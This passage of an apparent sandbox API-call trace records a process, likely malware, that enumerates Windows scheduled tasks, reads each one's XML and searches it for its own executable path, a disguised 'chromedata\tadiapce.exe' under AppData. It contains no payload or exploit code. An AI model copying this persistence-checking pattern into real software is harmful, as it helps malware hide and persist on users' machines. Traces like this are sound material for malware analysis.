	[0073.584] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="PvrScheduleTask") returned 0x0
	[0073.584] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrScheduleTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-135)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-136)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrSchedule</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{CEF51277-5358-477b-858C-4E14F0C80BF7}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.585] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrScheduleTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-135)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-136)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrSchedule</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{CEF51277-5358-477b-858C-4E14F0C80BF7}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.585] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.585] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x11, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.585] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="RecordingRestart") returned 0x0
	[0073.585] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RecordingRestart</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-127)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-128)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehrec</Command>\r\n      <Arguments>/RestartRecording</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.587] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RecordingRestart</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-127)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-128)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehrec</Command>\r\n      <Arguments>/RestartRecording</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.587] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.587] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x12, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.588] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="RegisterSearch") returned 0x0
	[0073.588] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RegisterSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRegisterSearch $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.589] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RegisterSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRegisterSearch $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.589] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.589] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x13, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.589] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="ReindexSearchRoot") returned 0x0
	[0073.589] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ReindexSearchRoot</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoReindexSearchRoot</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.591] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ReindexSearchRoot</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoReindexSearchRoot</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.591] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.591] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x14, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.591] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="SqlLiteRecoveryTask") returned 0x0
	[0073.591] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-133)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-134)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-SqlLiteRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{59116E30-02BD-4b84-BA1E-5D77E809B1A2}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.592] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-133)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-134)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-SqlLiteRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{59116E30-02BD-4b84-BA1E-5D77E809B1A2}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.592] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.593] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x15, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.593] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="UpdateRecordPath") returned 0x0
	[0073.593] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\UpdateRecordPath</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoUpdateRecordPath $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.594] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\UpdateRecordPath</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoUpdateRecordPath $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.594] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.594] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.594] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed0) returned 0x0
	[0073.595] ITaskFolderCollection:get_Count (in: This=0x55fed0, pCount=0x128e2c | out: pCount=0x128e2c*=1) returned 0x0
	[0073.595] ITaskFolderCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128e54 | out: ppFolder=0x128e54*=0x22c1048) returned 0x0
	[0073.595] ITaskFolder:GetTasks (in: This=0x22c1048, flags=1, ppTasks=0x128d28 | out: ppTasks=0x128d28*=0x22c1078) returned 0x0
	[0073.595] IRegisteredTaskCollection:get_Count (in: This=0x22c1078, pCount=0x128d18 | out: pCount=0x128d18*=0) returned 0x0
	[0073.595] IUnknown:Release (This=0x22c1078) returned 0x0
	[0073.595] ITaskFolder:GetFolders (in: This=0x22c1048, flags=0, ppFolders=0x128d1c | out: ppFolders=0x128d1c*=0x22c1078) returned 0x0
	[0073.595] ITaskFolderCollection:get_Count (in: This=0x22c1078, pCount=0x128d14 | out: pCount=0x128d14*=0) returned 0x0
	[0073.595] IUnknown:Release (This=0x22c1078) returned 0x0
	[0073.595] TaskScheduler:IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.595] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.596] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.596] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xe, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.596] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed8) returned 0x0
	[0073.596] IRegisteredTaskCollection:get_Count (in: This=0x55fed8, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.596] IRegisteredTaskCollection:get_Item (in: This=0x55fed8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.596] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="CorruptionDetector") returned 0x0
	[0073.596] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9ab90857-0ac9-49d3-845f-c235144fb537\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Application Popup'] and 